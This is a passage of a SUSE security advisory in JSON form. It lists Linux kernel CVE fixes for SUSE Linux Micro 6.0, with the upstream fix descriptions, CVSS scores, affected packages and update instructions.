"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53766",
"url": "https://www.suse.com/security/cve/CVE-2023-53766"
},
{
"category": "external",
"summary": "SUSE Bug 1255005 for CVE-2023-53766",
"url": "https://bugzilla.suse.com/1255005"
},
{
"category": "external",
"summary": "SUSE Bug 1255006 for CVE-2023-53766",
"url": "https://bugzilla.suse.com/1255006"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-53766"
},
{
"cve": "CVE-2023-53768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap-irq: Fix out-of-bounds access when allocating config buffers\n\nWhen allocating the 2D array for handling IRQ type registers in\nregmap_add_irq_chip_fwnode(), the intent is to allocate a matrix\nwith num_config_bases rows and num_config_regs columns.\n\nThis is currently handled by allocating a buffer to hold a pointer for\neach row (i.e. num_config_bases). After that, the logic attempts to\nallocate the memory required to hold the register configuration for\neach row. However, instead of doing this allocation for each row\n(i.e. num_config_bases allocations), the logic erroneously does this\nallocation num_config_regs number of times.\n\nThis scenario can lead to out-of-bounds accesses when num_config_regs\nis greater than num_config_bases. Fix this by updating the terminating\ncondition of the loop that allocates the memory for holding the register\nconfiguration to allocate memory only for each row in the matrix.\n\nAmit Pundir reported a crash that was occurring on his db845c device\ndue to memory corruption (see \"Closes\" tag for Amit\u0027s report). The KASAN\nreport below helped narrow it down to this issue:\n\n[ 14.033877][ T1] ==================================================================\n[ 14.042507][ T1] BUG: KASAN: invalid-access in regmap_add_irq_chip_fwnode+0x594/0x1364\n[ 14.050796][ T1] Write of size 8 at addr 06ffff8081021850 by task init/1\n\n[ 14.242004][ T1] The buggy address belongs to the object at ffffff8081021850\n[ 14.242004][ T1] which belongs to the cache kmalloc-8 of size 8\n[ 14.255669][ T1] The buggy address is located 0 bytes inside of\n[ 14.255669][ T1] 8-byte region [ffffff8081021850, ffffff8081021858)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53768",
"url": "https://www.suse.com/security/cve/CVE-2023-53768"
},
{
"category": "external",
"summary": "SUSE Bug 1254599 for CVE-2023-53768",
"url": "https://bugzilla.suse.com/1254599"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53768"
},
{
"cve": "CVE-2023-53777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: kill hooked chains to avoid loops on deduplicated compressed images\n\nAfter heavily stressing EROFS with several images which include a\nhand-crafted image of repeated patterns for more than 46 days, I found\ntwo chains could be linked with each other almost simultaneously and\nform a loop so that the entire loop won\u0027t be submitted. As a\nconsequence, the corresponding file pages will remain locked forever.\n\nIt can be _only_ observed on data-deduplicated compressed images.\nFor example, consider two chains with five pclusters in total:\n\tChain 1: 2-\u003e3-\u003e4-\u003e5 -- The tail pcluster is 5;\n Chain 2: 5-\u003e1-\u003e2 -- The tail pcluster is 2.\n\nChain 2 could link to Chain 1 with pcluster 5; and Chain 1 could link\nto Chain 2 at the same time with pcluster 2.\n\nSince hooked chains are all linked locklessly now, I have no idea how\nto simply avoid the race. Instead, let\u0027s avoid hooked chains completely\nuntil I could work out a proper way to fix this and end users finally\ntell us that it\u0027s needed to add it back.\n\nActually, this optimization can be found with multi-threaded workloads\n(especially even more often on deduplicated compressed images), yet I\u0027m\nnot sure about the overall system impacts of not having this compared\nwith implementation complexity.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53777",
"url": "https://www.suse.com/security/cve/CVE-2023-53777"
},
{
"category": "external",
"summary": "SUSE Bug 1254749 for CVE-2023-53777",
"url": "https://bugzilla.suse.com/1254749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53777"
},
{
"cve": "CVE-2023-53778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/qaic: Clean up integer overflow checking in map_user_pages()\n\nThe encode_dma() function has some validation on in_trans-\u003esize but it\nwould be more clear to move those checks to find_and_map_user_pages().\n\nThe encode_dma() had two checks:\n\n\tif (in_trans-\u003eaddr + in_trans-\u003esize \u003c in_trans-\u003eaddr || !in_trans-\u003esize)\n\t\treturn -EINVAL;\n\nThe in_trans-\u003eaddr variable is the starting address. The in_trans-\u003esize\nvariable is the total size of the transfer. The transfer can occur in\nparts and the resources-\u003exferred_dma_size tracks how many bytes we have\nalready transferred.\n\nThis patch introduces a new variable \"remaining\" which represents the\namount we want to transfer (in_trans-\u003esize) minus the amount we have\nalready transferred (resources-\u003exferred_dma_size).\n\nI have modified the check for if in_trans-\u003esize is zero to instead check\nif in_trans-\u003esize is less than resources-\u003exferred_dma_size. If we have\nalready transferred more bytes than in_trans-\u003esize then there are negative\nbytes remaining which doesn\u0027t make sense. If there are zero bytes\nremaining to be copied, just return success.\n\nThe check in encode_dma() checked that \"addr + size\" could not overflow\nand barring a driver bug that should work, but it\u0027s easier to check if\nwe do this in parts. First check that \"in_trans-\u003eaddr +\nresources-\u003exferred_dma_size\" is safe. Then check that \"xfer_start_addr +\nremaining\" is safe.\n\nMy final concern was that we are dealing with u64 values but on 32bit\nsystems the kmalloc() function will truncate the sizes to 32 bits. So\nI calculated \"total = in_trans-\u003esize + offset_in_page(xfer_start_addr);\"\nand returned -EINVAL if it were \u003e= SIZE_MAX. This will not affect 64bit\nsystems.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53778",
"url": "https://www.suse.com/security/cve/CVE-2023-53778"
},
{
"category": "external",
"summary": "SUSE Bug 1254761 for CVE-2023-53778",
"url": "https://bugzilla.suse.com/1254761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53778"
},
{
"cve": "CVE-2023-53782",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53782"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndccp: Fix out of bounds access in DCCP error handler\n\nThere was a previous attempt to fix an out-of-bounds access in the DCCP\nerror handlers, but that fix assumed that the error handlers only want\nto access the first 8 bytes of the DCCP header. Actually, they also look\nat the DCCP sequence number, which is stored beyond 8 bytes, so an\nexplicit pskb_may_pull() is required.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53782",
"url": "https://www.suse.com/security/cve/CVE-2023-53782"
},
{
"category": "external",
"summary": "SUSE Bug 1254758 for CVE-2023-53782",
"url": "https://bugzilla.suse.com/1254758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53782"
},
{
"cve": "CVE-2023-53784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: bridge: dw_hdmi: fix connector access for scdc\n\nCommit 5d844091f237 (\"drm/scdc-helper: Pimp SCDC debugs\") changed the scdc\ninterface to pick up an i2c adapter from a connector instead. However, in\nthe case of dw-hdmi, the wrong connector was being used to pass i2c adapter\ninformation, since dw-hdmi\u0027s embedded connector structure is only populated\nwhen the bridge attachment callback explicitly asks for it.\n\ndrm-meson is handling connector creation, so this won\u0027t happen, leading to\na NULL pointer dereference.\n\nFix it by having scdc functions access dw-hdmi\u0027s current connector pointer\ninstead, which is assigned during the bridge enablement stage.\n\n[narmstrong: moved Fixes tag before first S-o-b and added Reported-by tag]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53784",
"url": "https://www.suse.com/security/cve/CVE-2023-53784"
},
{
"category": "external",
"summary": "SUSE Bug 1254765 for CVE-2023-53784",
"url": "https://bugzilla.suse.com/1254765"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53784"
},
{
"cve": "CVE-2023-53785",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53785"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmt76: mt7921: don\u0027t assume adequate headroom for SDIO headers\n\nmt7921_usb_sdio_tx_prepare_skb() calls mt7921_usb_sdio_write_txwi() and\nmt7921_skb_add_usb_sdio_hdr(), both of which blindly assume that\nadequate headroom will be available in the passed skb. This assumption\ntypically is satisfied when the skb was allocated in the net core for\ntransmission via the mt7921 netdev (although even that is only an\noptimization and is not strictly guaranteed), but the assumption is\nsometimes not satisfied when the skb originated in the receive path of\nanother netdev and was passed through to the mt7921, such as by the\nbridge layer. Blindly prepending bytes to an skb is always wrong.\n\nThis commit introduces a call to skb_cow_head() before the call to\nmt7921_usb_sdio_write_txwi() in mt7921_usb_sdio_tx_prepare_skb() to\nensure that at least MT_SDIO_TXD_SIZE + MT_SDIO_HDR_SIZE bytes can be\npushed onto the skb.\n\nWithout this fix, I can trivially cause kernel panics by bridging an\nMT7921AU-based USB 802.11ax interface with an Ethernet interface on an\nIntel Atom-based x86 system using its onboard RTL8169 PCI Ethernet\nadapter and also on an ARM-based Raspberry Pi 1 using its onboard\nSMSC9512 USB Ethernet adapter. Note that the panics do not occur in\nevery system configuration, as they occur only if the receiving netdev\nleaves less headroom in its received skbs than the mt7921 needs for its\nSDIO headers.\n\nHere is an example stack trace of this panic on Raspberry Pi OS Lite\n2023-02-21 running kernel 6.1.24+ [1]:\n\n skb_panic from skb_push+0x44/0x48\n skb_push from mt7921_usb_sdio_tx_prepare_skb+0xd4/0x190 [mt7921_common]\n mt7921_usb_sdio_tx_prepare_skb [mt7921_common] from mt76u_tx_queue_skb+0x94/0x1d0 [mt76_usb]\n mt76u_tx_queue_skb [mt76_usb] from __mt76_tx_queue_skb+0x4c/0xc8 [mt76]\n __mt76_tx_queue_skb [mt76] from mt76_txq_schedule.part.0+0x13c/0x398 [mt76]\n mt76_txq_schedule.part.0 [mt76] from mt76_txq_schedule_all+0x24/0x30 [mt76]\n mt76_txq_schedule_all [mt76] from mt7921_tx_worker+0x58/0xf4 [mt7921_common]\n mt7921_tx_worker [mt7921_common] from __mt76_worker_fn+0x9c/0xec [mt76]\n __mt76_worker_fn [mt76] from kthread+0xbc/0xe0\n kthread from ret_from_fork+0x14/0x34\n\nAfter this fix, bridging the mt7921 interface works fine on both of my\npreviously problematic systems.\n\n[1] https://github.com/raspberrypi/firmware/tree/5c276f55a4b21345cd4d6200a504ee991851ff7a",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
